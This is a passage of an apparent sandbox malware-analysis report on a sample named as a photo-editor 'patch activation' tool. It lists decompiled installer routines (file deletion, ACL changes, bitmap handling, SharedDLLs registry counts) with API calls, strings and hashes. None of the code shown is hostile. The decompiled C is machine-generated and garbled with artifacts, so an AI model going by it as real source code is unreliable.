/REG, xrefs: 0049B289
.lst, xrefs: 0049B368
.msg, xrefs: 0049B34E
Inno-Setup-RegSvr-Mutex, xrefs: 0049B2E1
/REGU, xrefs: 0049B2AD
Setup, xrefs: 0049B2C3

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: ShowWindow$CreateFileModuleMultipleMutexNameObjectsWait
String ID: .lst$.msg$/REG$/REGU$Inno-Setup-RegSvr-Mutex$Setup
API String ID: 2000705611-3672972446
Opcode ID: 54842cf7ccc2a9b33fe1cdc6de98555f44b5594df05092a8dd398ae490e4fadd
Instruction ID: b2f29c3ed6207bb9e160049bb2bddfcad5bd5dcd32a025f4107ba54bac6b8e5f
Opcode Fuzzy Hash: 54842cf7ccc2a9b33fe1cdc6de98555f44b5594df05092a8dd398ae490e4fadd
Instruction Fuzzy Hash: E691D430A04204AFDF11EBA5E952BAE7FB5EB49308F514477F900A7292C77CAC05DB99

Uniqueness

Uniqueness Score: -1.00%

Function 0045AF68 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 209
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E0045AF68(char __eax, void* __ebx, char __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, char _a4, char _a8, intOrPtr _a12) {
				char _v5;
				char _v6;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				void* _t61;
				void* _t69;
				void* _t113;
				void* _t137;
				intOrPtr _t164;
				intOrPtr _t176;
				void* _t186;
				signed int _t187;
				char _t189;
				void* _t191;
				void* _t192;
				intOrPtr _t193;

				_t185 = __edi;
				_t138 = __ecx;
				_t191 = _t192;
				_t193 = _t192 + 0xffffffec;
				_push(__edi);
				_v12 = 0;
				_v24 = 0;
				_v5 = __ecx;
				_t137 = __edx;
				_t189 = __eax;
				_push(_t191);
				_push(0x45b224);
				_push( *[fs:eax]);
				 *[fs:eax] = _t193;
				_v6 = 1;
				E0042CD8C(__eax, __ecx,  &_v12, __eflags);
				_t61 = E00406F54(_v12, 0x45b240);
				_t195 = _t61;
				if(_t61 != 0) {
					E0042CD8C(_t189, _t138,  &_v12, __eflags);
					__eflags = E00406F54(_v12, 0x45b270);
					if(__eflags == 0) {
						E0042C988(_t189, _t137,  &_v12, 0x45b280, __edi, _t189, __eflags);
						__eflags = 0;
						E0045AF68(_v12, _t137, 0, _t137, __edi, _t189, 0, 0, 0, _a12);
						_pop(_t138);
					}
				} else {
					E0042C988(_t189, _t137,  &_v12, 0x45b250, __edi, _t189, _t195);
					E0045AF68(_v12, _t137, 0, _t137, __edi, _t189, _t195, 0, 0, _a12);
					E0042C988(_t189, _t137,  &_v12, 0x45b260, __edi, _t189, _t195);
					E0045AF68(_v12, _t137, 0, _t137, _t185, _t189, _t195, 0, 0, _a12);
					_pop(_t138);
				}
				E0042CD8C(_t189, _t138,  &_v12, _t195);
				_t69 = E00406F54(_v12, 0x45b290);
				_t196 = _t69;
				if(_t69 == 0) {
					E00457750(_t189, _t137, _t185, _t189);
				}
				if(E00453578(_t137, _t189, _t196) == 0) {
					L23:
					_pop(_t164);
					 *[fs:eax] = _t164;
					_push(E0045B22B);
					E00403400( &_v24);
					return E00403400( &_v12);
				} else {
					_v20 = _t189;
					_v16 = 0xb;
					_t141 = 0;
					E004587AC("Deleting file: %s", _t137, 0,  &_v20, _t185, _t189);
					_t198 = _a4;
					if(_a4 != 0) {
						_t187 = E004532B8(_t137, _t189, _t198);
						if(_t187 != 0xffffffff) {
							_t200 = _t187 & 0x00000001;
							if((_t187 & 0x00000001) != 0) {
								_t141 = _t187 & 0xfffffffe;
								_t113 = E00453660(_t137, _t187 & 0xfffffffe, _t189, _t200);
								_t201 = _t113;
								if(_t113 == 0) {
									E004585A0("Failed to strip read-only attribute.", _t137, _t141, _t187, _t189);
								} else {
									E004585A0("Stripped read-only attribute.", _t137, _t141, _t187, _t189);
								}
							}
						}
					}
					if(E004530E0(_t137, _t189, _t201) != 0) {
						__eflags = _v5;
						if(_v5 != 0) {
							SHChangeNotify(4, 1, E00403738(_t189), 0);
							E0042CD34(_t189, _t141,  &_v12);
							E00456B48( *((intOrPtr*)(_a12 - 0x14)), _t141, _v12);
						}
						goto L23;
					} else {
						_t186 = GetLastError();
						if(_a8 == 0 ||  *((char*)(_a12 - 1)) == 0) {
							L20:
							_v20 = _t186;
							_v16 = 0;
							E004587AC("Failed to delete the file; it may be in use (%d).", _t137, 0,  &_v20, _t186, _t189);
							_v6 = 0;
							goto L23;
						} else {
							if(_t186 == 5) {
								L18:
								if((E004532B8(_t137, _t189, _t206) & 0x00000001) != 0) {
									goto L20;
								}
								_v20 = _t186;
								_v16 = 0;
								E004587AC("The file appears to be in use (%d). Will delete on restart.", _t137, 0,  &_v20, _t186, _t189);
								_push(_t191);
								_push(0x45b181);
								_push( *[fs:eax]);
								 *[fs:eax] = _t193;
								E0045452C(_t137, _t137, _t189, _t186, _t189);
								 *((char*)( *((intOrPtr*)(_a12 - 8)) + 0x1c)) = 1;
								E0042CC94(_t189,  &_v24);
								E0042CD34(_v24, 0,  &_v12);
								E00456B48( *((intOrPtr*)(_a12 + 0xfffffffffffffff0)), _a12, _v12);
								_pop(_t176);
								 *[fs:eax] = _t176;
								goto L23;
							}
							_t206 = _t186 - 0x20;
							if(_t186 != 0x20) {
								goto L20;
							}
							goto L18;
						}
					}
				}
			}

0x0045af68
0x0045af68
0x0045af69
0x0045af6b
0x0045af70
0x0045af73
0x0045af76
0x0045af79
0x0045af7c
0x0045af7e
0x0045af82
0x0045af83
0x0045af88
0x0045af8b
0x0045af8e
0x0045af97
0x0045afa4
0x0045afa9
0x0045afab
0x0045affc
0x0045b00e
0x0045b010
0x0045b024
0x0045b02c
0x0045b030
0x0045b035
0x0045b035
0x0045afad
0x0045afbf
0x0045afcb
0x0045afe3
0x0045afef
0x0045aff4
0x0045aff4
0x0045b03b
0x0045b048
0x0045b04d
0x0045b04f
0x0045b053
0x0045b053
0x0045b063
0x0045b206
0x0045b208
0x0045b20b
0x0045b20e
0x0045b216
0x0045b223
0x0045b069
0x0045b069
0x0045b06c
0x0045b073
0x0045b07a
0x0045b07f
0x0045b083
0x0045b08e
0x0045b093
0x0045b095
0x0045b09b
0x0045b09f
0x0045b0a6
0x0045b0ab
0x0045b0ad
0x0045b0c0
0x0045b0af
0x0045b0b4
0x0045b0b4
0x0045b0ad
0x0045b09b
0x0045b093
0x0045b0d0
0x0045b1d5
0x0045b1d9
0x0045b1e9
0x0045b1f3
0x0045b201
0x0045b201
0x00000000
0x0045b0d6
0x0045b0db
0x0045b0e1
0x0045b1b9
0x0045b1b9
0x0045b1bc
0x0045b1ca
0x0045b1cf
0x00000000
0x0045b0f4
0x0045b0f7
0x0045b102
0x0045b10d
0x00000000
0x00000000
0x0045b113
0x0045b116
0x0045b124
0x0045b12b
0x0045b12c
0x0045b131
0x0045b134
0x0045b13d
0x0045b148
0x0045b151
0x0045b15c
0x0045b16f
0x0045b176
0x0045b179
0x00000000
0x0045b179
0x0045b0f9
0x0045b0fc
0x00000000
0x00000000
0x00000000
0x0045b0fc
0x0045b0e1
0x0045b0d0

APIs

GetLastError.KERNEL32(00000000,0045B224,?,?,?,?,?,00000006,?,00000000,0049A6E1,?,00000000,0049A784), ref: 0045B0D6

Strings

.chm, xrefs: 0045B004
The file appears to be in use (%d). Will delete on restart., xrefs: 0045B11F
.lnk, xrefs: 0045B043
Failed to strip read-only attribute., xrefs: 0045B0BB
.gid, xrefs: 0045AFB8
Failed to delete the file; it may be in use (%d)., xrefs: 0045B1C5
.fts, xrefs: 0045AFDC
Stripped read-only attribute., xrefs: 0045B0AF
Deleting file: %s, xrefs: 0045B075
.hlp, xrefs: 0045AF9F
.chw, xrefs: 0045B01D

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: ErrorLast
String ID: .chm$.chw$.fts$.gid$.hlp$.lnk$Deleting file: %s$Failed to delete the file; it may be in use (%d).$Failed to strip read-only attribute.$Stripped read-only attribute.$The file appears to be in use (%d). Will delete on restart.
API String ID: 1452528299-3112430753
Opcode ID: 2a7375cef4bbeb56e1cd21bd53300643946b6a4045eed4ff632bea3e1f298e8e
Instruction ID: 2fb3476e9d017ff0a5902371132bc4733b6d883e7af691887050c1a5ddfae389
Opcode Fuzzy Hash: 2a7375cef4bbeb56e1cd21bd53300643946b6a4045eed4ff632bea3e1f298e8e
Instruction Fuzzy Hash: 8E71A0307002486BCB01EB6998867AF7BA5EF48705F50846BFC11DB383DB7C9A49879D

Uniqueness

Uniqueness Score: -1.00%

Function 0045D450 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 182
libraryloadermemoryCOMMON

Download Yara Rule

C-Code - Quality: 36%

			E0045D450(intOrPtr __eax, struct _SID_IDENTIFIER_AUTHORITY* __ecx, void* __edx, intOrPtr _a4, signed int _a8) {
				intOrPtr _v8;
				struct _SID_IDENTIFIER_AUTHORITY* _v12;
				long _v16;
				_Unknown_base(*)()* _v20;
				_Unknown_base(*)()* _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				void* _v40;
				int _v44;
				void* _v48;
				void* __edi;
				int _t106;
				signed int _t108;
				void* _t114;
				signed int _t116;
				intOrPtr _t128;
				int _t137;
				int _t139;
				int _t140;
				struct HINSTANCE__* _t143;
				struct _SID_IDENTIFIER_AUTHORITY* _t144;
				void* _t146;
				void* _t148;
				intOrPtr _t149;

				_t125 = __edx;
				_t146 = _t148;
				_t149 = _t148 + 0xffffffd4;
				_v12 = __ecx;
				_t114 = __edx;
				_v8 = __eax;
				if( *0x49c0dc != 2 || (GetVersion() & 0x000000ff) < 5) {
					_v16 = 1;
					goto L19;
				} else {
					_t143 = GetModuleHandleA("advapi32.dll");
					_t137 = GetProcAddress(_t143, "GetNamedSecurityInfoW");
					_v20 = GetProcAddress(_t143, "SetNamedSecurityInfoW");
					_v24 = GetProcAddress(_t143, "SetEntriesInAclW");
					__eflags = _t137;
					if(_t137 == 0) {
						L6:
						_v16 = 0x7f;
						goto L19;
					} else {
						__eflags = _v20;
						if(_v20 == 0) {
							goto L6;
						} else {
							__eflags = _v24;
							if(_v24 != 0) {
								_v28 = E0045D358(_t114, _t125);
								 *[fs:edx] = _t149;
								_v44 = 0;
								_v16 =  *_t137(_v28, _v8, 4, 0, 0,  &_v36, 0,  &_v32,  *[fs:edx], 0x45d6c2, _t146);
								__eflags = _v16;
								if(__eflags == 0) {
									_push(_t146);
									_push(0x45d6a5);
									_push( *[fs:edx]);
									 *[fs:edx] = _t149;
									_v44 = E00406E6C(_a8 << 5, 0, _t137, __eflags);
									_t144 = _v12;
									_t139 = _a8 - 1;
									__eflags = _t139;
									if(_t139 < 0) {
										L16:
										_v16 = _v24(_a8, _v44, _v36,  &_v40);
										__eflags = _v16;
										if(_v16 == 0) {
											 *[fs:eax] = _t149;
											_v16 = _v20(_v28, _v8, 4, 0, 0, _v40, 0,  *[fs:eax], 0x45d64c, _t146);
											__eflags = 0;
											_pop(_t128);
											 *[fs:eax] = _t128;
											_push(0x45d653);
											return LocalFree(_v40);
										} else {
											E004031BC();
											E004031BC();
											goto L19;
										}
									} else {
										_t140 = _t139 + 1;
										_t116 = 0;
										__eflags = 0;
										while(1) {
											_t106 = AllocateAndInitializeSid(_t144,  *(_t144 + 6),  *(_t144 + 8),  *(_t144 + 0xc), 0, 0, 0, 0, 0, 0,  &_v48);
											__eflags = _t106;
											if(_t106 == 0) {
												break;
											}
											_t108 = _t116 << 2;
											 *((intOrPtr*)(_v44 + _t108 * 8)) =  *((intOrPtr*)(_t144 + 0x10));
											 *((intOrPtr*)(_v44 + 4 + _t108 * 8)) = 1;
											 *((intOrPtr*)(_v44 + 8 + _t108 * 8)) = _a4;
											 *((intOrPtr*)(_v44 + 0x14 + _t108 * 8)) = 0;
											 *((intOrPtr*)(_v44 + 0x18 + _t108 * 8)) = 0;
											 *((intOrPtr*)(_v44 + 0x1c + _t108 * 8)) = _v48;
											_t144 = _t144 + 0x14;
											_t116 = _t116 + 1;
											_t140 = _t140 - 1;
											__eflags = _t140;
											if(_t140 != 0) {
												continue;
											} else {
												goto L16;
											}
											goto L20;
										}
										_v16 = GetLastError();
										__eflags = _v16;
										if(_v16 == 0) {
											_v16 = 0x57;
										}
										E004031BC();
										E004031BC();
										goto L19;
									}
								} else {
									E004031BC();
									L19:
									return _v16;
								}
							} else {
								goto L6;
							}
						}
					}
				}
				L20:
			}

0x0045d450
0x0045d451
0x0045d453
0x0045d459
0x0045d45c
0x0045d45e
0x0045d468
0x0045d479
0x00000000
0x0045d485
0x0045d48f
0x0045d49c
0x0045d4a9
0x0045d4b7
0x0045d4ba
0x0045d4bc
0x0045d4ca
0x0045d4ca
0x00000000
0x0045d4be
0x0045d4be
0x0045d4c2
0x00000000
0x0045d4c4
0x0045d4c4
0x0045d4c8
0x0045d4dd
0x0045d4eb
0x0045d4f0
0x0045d50d
0x0045d510
0x0045d514
0x0045d522
0x0045d523
0x0045d528
0x0045d52b
0x0045d539
0x0045d53c
0x0045d542
0x0045d543
0x0045d545
0x0045d5e2
0x0045d5f5
0x0045d5f8
0x0045d5fc
0x0045d618
0x0045d632
0x0045d635
0x0045d637
0x0045d63a
0x0045d63d
0x0045d64b
0x0045d5fe
0x0045d5fe
0x0045d603
0x00000000
0x0045d603
0x0045d54b
0x0045d54b
0x0045d54c
0x0045d54c
0x0045d54e
0x0045d56b
0x0045d570
0x0045d572
0x00000000
0x00000000
0x0045d59a
0x0045d5a3
0x0045d5a9
0x0045d5b7
0x0045d5c0
0x0045d5c9
0x0045d5d3
0x0045d5d7
0x0045d5da
0x0045d5db
0x0045d5db
0x0045d5dc
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0045d5dc
0x0045d579
0x0045d57c
0x0045d580
0x0045d582
0x0045d582
0x0045d589
0x0045d58e
0x00000000
0x0045d58e
0x0045d516
0x0045d516
0x0045d6c9
0x0045d6d2
0x0045d6d2
0x00000000
0x00000000
0x00000000
0x0045d4c8
0x0045d4c2
0x0045d4bc
0x00000000

APIs

GetVersion.KERNEL32 ref: 0045D46A
GetModuleHandleA.KERNEL32(advapi32.dll), ref: 0045D48A
GetProcAddress.KERNEL32(00000000,GetNamedSecurityInfoW), ref: 0045D497
GetProcAddress.KERNEL32(00000000,SetNamedSecurityInfoW), ref: 0045D4A4
GetProcAddress.KERNEL32(00000000,SetEntriesInAclW), ref: 0045D4B2

Part of subcall function 0045D358: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0045D3F7,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0045D3D1

AllocateAndInitializeSid.ADVAPI32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045D6A5,?,?,00000000), ref: 0045D56B
GetLastError.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045D6A5,?,?,00000000), ref: 0045D574

Strings

advapi32.dll, xrefs: 0045D485
GetNamedSecurityInfoW, xrefs: 0045D491
SetNamedSecurityInfoW, xrefs: 0045D49E
W, xrefs: 0045D582
SetEntriesInAclW, xrefs: 0045D4AC

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: AddressProc$AllocateByteCharErrorHandleInitializeLastModuleMultiVersionWide
String ID: GetNamedSecurityInfoW$SetEntriesInAclW$SetNamedSecurityInfoW$W$advapi32.dll
API String ID: 59345061-4263478283
Opcode ID: 0828ca59996f9c66a971ac7fdd8876921b69cb906109572e65858b8da3e68693
Instruction ID: 783a5280d5c6dd2c4afe06b2d07c38c27ed9239d6cb54be80e3f389c0ae86338
Opcode Fuzzy Hash: 0828ca59996f9c66a971ac7fdd8876921b69cb906109572e65858b8da3e68693
Instruction Fuzzy Hash: B75164B1D00608EFDB20DF99C841BAEB7B8EF48315F14806AF915B7381D6789945CF69

Uniqueness

Uniqueness Score: -1.00%

Function 0041B83C Relevance: 21.1, APIs: 14, Instructions: 126
windowCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E0041B83C(void* __eax, void* __ecx, void* __edx) {
				void* _v8;
				int _v12;
				int _v16;
				struct HBITMAP__* _v20;
				struct HDC__* _v24;
				struct HDC__* _v28;
				struct HDC__* _v32;
				int _v48;
				int _v52;
				void _v56;
				void* _t79;
				intOrPtr _t84;
				void* _t91;
				void* _t93;
				void* _t95;
				intOrPtr _t96;

				_t93 = _t95;
				_t96 = _t95 + 0xffffffcc;
				asm("movsd");
				asm("movsd");
				_v8 = __eax;
				_v28 = CreateCompatibleDC(0);
				_v32 = CreateCompatibleDC(0);
				GetObjectA(_v8, 0x18,  &_v56);
				if(__ecx == 0) {
					_v24 = GetDC(0);
					if(_v24 == 0) {
						E0041B824();
					}
					_push(_t93);
					_push(0x41b8eb);
					_push( *[fs:eax]);
					 *[fs:eax] = _t96;
					_v20 = CreateCompatibleBitmap(_v24, _v16, _v12);
					if(_v20 == 0) {
						E0041B824();
					}
					_pop(_t84);
					 *[fs:eax] = _t84;
					_push(E0041B8F2);
					return ReleaseDC(0, _v24);
				} else {
					_v20 = CreateBitmap(_v16, _v12, 1, 1, 0);
					if(_v20 != 0) {
						_t79 = SelectObject(_v28, _v8);
						_t91 = SelectObject(_v32, _v20);
						StretchBlt(_v32, 0, 0, _v16, _v12, _v28, 0, 0, _v52, _v48, 0xcc0020);
						if(_t79 != 0) {
							SelectObject(_v28, _t79);
						}
						if(_t91 != 0) {
							SelectObject(_v32, _t91);
						}
					}
					DeleteDC(_v28);
					DeleteDC(_v32);
					return _v20;
				}
			}

0x0041b83d
0x0041b83f
0x0041b84a
0x0041b84b
0x0041b84e
0x0041b858
0x0041b862
0x0041b86f
0x0041b876
0x0041b897
0x0041b89e
0x0041b8a0
0x0041b8a0
0x0041b8a7
0x0041b8a8
0x0041b8ad
0x0041b8b0
0x0041b8c4
0x0041b8cb
0x0041b8cd
0x0041b8cd
0x0041b8d4
0x0041b8d7
0x0041b8da
0x0041b8ea
0x0041b878
0x0041b88b
0x0041b8f6
0x0041b905
0x0041b914
0x0041b93b
0x0041b942
0x0041b949
0x0041b949
0x0041b950
0x0041b957
0x0041b957
0x0041b950
0x0041b960
0x0041b969
0x0041b977
0x0041b977

APIs

CreateCompatibleDC.GDI32(00000000), ref: 0041B853
CreateCompatibleDC.GDI32(00000000), ref: 0041B85D
GetObjectA.GDI32(?,00000018,00000004), ref: 0041B86F
CreateBitmap.GDI32(0000000B,?,00000001,00000001,00000000), ref: 0041B886
GetDC.USER32(00000000), ref: 0041B892
CreateCompatibleBitmap.GDI32(00000000,0000000B,?), ref: 0041B8BF
ReleaseDC.USER32 ref: 0041B8E5
SelectObject.GDI32(00000000,?), ref: 0041B900
SelectObject.GDI32(?,00000000), ref: 0041B90F
StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B93B
SelectObject.GDI32(00000000,00000000), ref: 0041B949
SelectObject.GDI32(?,00000000), ref: 0041B957
DeleteDC.GDI32(00000000), ref: 0041B960
DeleteDC.GDI32(?), ref: 0041B969

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: Object$CreateSelect$Compatible$BitmapDelete$ReleaseStretch
String ID:
API String ID: 644427674-0
Opcode ID: 73ee91a3acc86688725df9706b2ea354b5f5707f63fbf8f57308390f59fb2a3c
Instruction ID: 5bdd10242b191c11111876c14ee0e8e9a171a3e9253023a3b6fe339c600245b0
Opcode Fuzzy Hash: 73ee91a3acc86688725df9706b2ea354b5f5707f63fbf8f57308390f59fb2a3c
Instruction Fuzzy Hash: F841AC71E40659ABDF10EAE9D846FAFB7BCEB08704F104466F614FB281C77869408BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00455070 Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 244
registryCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E00455070(void* __ebx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				char _v9;
				void* _v16;
				char _v17;
				char _v24;
				int _v28;
				int _v32;
				char _v36;
				char _v40;
				char* _v44;
				char _v48;
				char _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				char* _v64;
				char _v68;
				char _v72;
				void* _t75;
				void* _t94;
				void* _t99;
				void* _t103;
				char* _t106;
				void* _t129;
				void* _t164;
				void* _t169;
				intOrPtr _t187;
				intOrPtr _t191;
				intOrPtr _t193;
				void* _t205;
				void* _t206;
				intOrPtr _t207;

				_t205 = _t206;
				_t207 = _t206 + 0xffffffbc;
				_v40 = 0;
				_v52 = 0;
				_v68 = 0;
				_v72 = 0;
				_v36 = 0;
				_v8 = __edx;
				_push(_t205);
				_push(0x455340);
				_push( *[fs:edx]);
				 *[fs:edx] = _t207;
				_v9 = 0;
				_t169 = E0042E2AC(_t75, "Software\\Microsoft\\Windows\\CurrentVersion\\SharedDLLs", 0x80000002,  &_v16, 3, 0);
				if(_t169 == 2) {
					L28:
					_pop(_t187);
					 *[fs:eax] = _t187;
					_push(E00455347);
					E00403420( &_v72, 2);
					E00403400( &_v52);
					return E00403420( &_v40, 2);
				} else {
					if(_t169 != 0) {
						E00453DAC(0x80000002,  &_v52);
						_v48 = _v52;
						_v44 = "Software\\Microsoft\\Windows\\CurrentVersion\\SharedDLLs";
						E00451C00(0x44, 1,  &_v48,  &_v40);
						E0040357C( &_v40, 0x4553d4);
						_push( &_v40);
						_v64 = "RegOpenKeyEx";
						E004071F8(_t169,  &_v68);
						_v60 = _v68;
						E0042ED58(_t169,  &_v72);
						_v56 = _v72;
						E00451C00(0x3b, 2,  &_v64,  &_v52);
						_pop(_t164);
						E0040357C(_t164, _v52);
						E0040909C(_v40, 1);
						E0040311C();
					}
					_push(_t205);
					_push(0x455309);
					_push( *[fs:eax]);
					 *[fs:eax] = _t207;
					if(RegQueryValueExA(_v16, E00403738(_v8), 0,  &_v28, 0,  &_v32) == 0) {
						_v17 = 0;
						_v24 = 0;
						_push(_t205);
						_push(0x455253);
						_push( *[fs:eax]);
						 *[fs:eax] = _t207;
						_t94 = _v28 - 1;
						if(_t94 == 0) {
							if(E0042E1DC() != 0) {
								_v24 = E00407228(_v36,  &_v36);
								_v17 = 1;
							}
						} else {
							_t129 = _t94 - 2;
							if(_t129 == 0) {
								if(_v32 >= 1 && _v32 <= 4 && RegQueryValueExA(_v16, E00403738(_v8), 0, 0,  &_v24,  &_v32) == 0) {
									_v17 = 1;
								}
							} else {
								if(_t129 == 1) {
									_v32 = 4;
									if(RegQueryValueExA(_v16, E00403738(_v8), 0, 0,  &_v24,  &_v32) == 0) {
										_v17 = 1;
									}
								}
							}
						}
						_pop(_t191);
						 *[fs:eax] = _t191;
						if(_v17 != 0) {
							_v24 = _v24 - 1;
							if(_v24 > 0) {
								_t99 = _v28 - 1;
								if(_t99 == 0) {
									E004071F8(_v24,  &_v36);
									_t103 = E00403574(_v36);
									_t106 = E00403738(_v36);
									RegSetValueExA(_v16, E00403738(_v8), 0, 1, _t106, _t103 + 1);
								} else {
									if(_t99 + 0xfffffffe - 2 < 0) {
										RegSetValueExA(_v16, E00403738(_v8), 0, _v28,  &_v24, 4);
									}
								}
							} else {
								_v9 = 1;
								RegDeleteValueA(_v16, E00403738(_v8));
							}
							_pop(_t193);
							 *[fs:eax] = _t193;
							_push(E00455310);
							return RegCloseKey(_v16);
						} else {
							E004031BC();
							goto L28;
						}
					} else {
						E004031BC();
						goto L28;
					}
				}
			}

0x00455071
0x00455073
0x0045507b
0x0045507e
0x00455081
0x00455084
0x00455087
0x0045508a
0x0045508f
0x00455090
0x00455095
0x00455098
0x0045509b
0x004550b6
0x004550bb
0x00455310
0x00455312
0x00455315
0x00455318
0x00455325
0x0045532d
0x0045533f
0x004550c1
0x004550c3
0x004550d5
0x004550dd
0x004550e5
0x004550f2
0x004550ff
0x00455107
0x00455111
0x00455119
0x00455121
0x00455129
0x00455131
0x0045513e
0x00455146
0x00455147
0x00455156
0x0045515b
0x0045515b
0x00455162
0x00455163
0x00455168
0x0045516b
0x00455190
0x0045519c
0x004551a2
0x004551a7
0x004551a8
0x004551ad
0x004551b0
0x004551b6
0x004551b7
0x004551d5
0x004551df
0x004551e2
0x004551e2
0x004551b9
0x004551b9
0x004551bc
0x004551ec
0x00455216
0x00455216
0x004551be
0x004551bf
0x0045521c
0x00455243
0x00455245
0x00455245
0x00455243
0x004551bf
0x004551bc
0x0045524b
0x0045524e
0x00455261
0x0045526d
0x00455274
0x00455291
0x00455292
0x004552a4
0x004552ac
0x004552b6
0x004552cd
0x00455294
0x0045529a
0x004552ed
0x004552ed
0x0045529a
0x00455276
0x00455276
0x00455287
0x00455287
0x004552f4
0x004552f7
0x004552fa
0x00455308
0x00455263
0x00455263
0x00000000
0x00455263
0x00455192
0x00455192
0x00000000
0x00455192
0x00455190

APIs

Part of subcall function 0042E2AC: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00485FB3,?,00000001,?,?,00485FB3,?,00000001,00000000), ref: 0042E2C8

RegQueryValueExA.ADVAPI32(0045B3FA,00000000,00000000,?,00000000,?,00000000,00455309,?,0045B3FA,00000003,00000000,00000000,00455340), ref: 00455189

Part of subcall function 0042ED58: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00453A6B,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042ED77

RegQueryValueExA.ADVAPI32(0045B3FA,00000000,00000000,00000000,?,00000004,00000000,00455253,?,0045B3FA,00000000,00000000,?,00000000,?,00000000), ref: 0045520D
RegQueryValueExA.ADVAPI32(0045B3FA,00000000,00000000,00000000,?,00000004,00000000,00455253,?,0045B3FA,00000000,00000000,?,00000000,?,00000000), ref: 0045523C

Strings

Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 004550A7
, xrefs: 004550FA
Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 004550E0
RegOpenKeyEx, xrefs: 0045510C

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

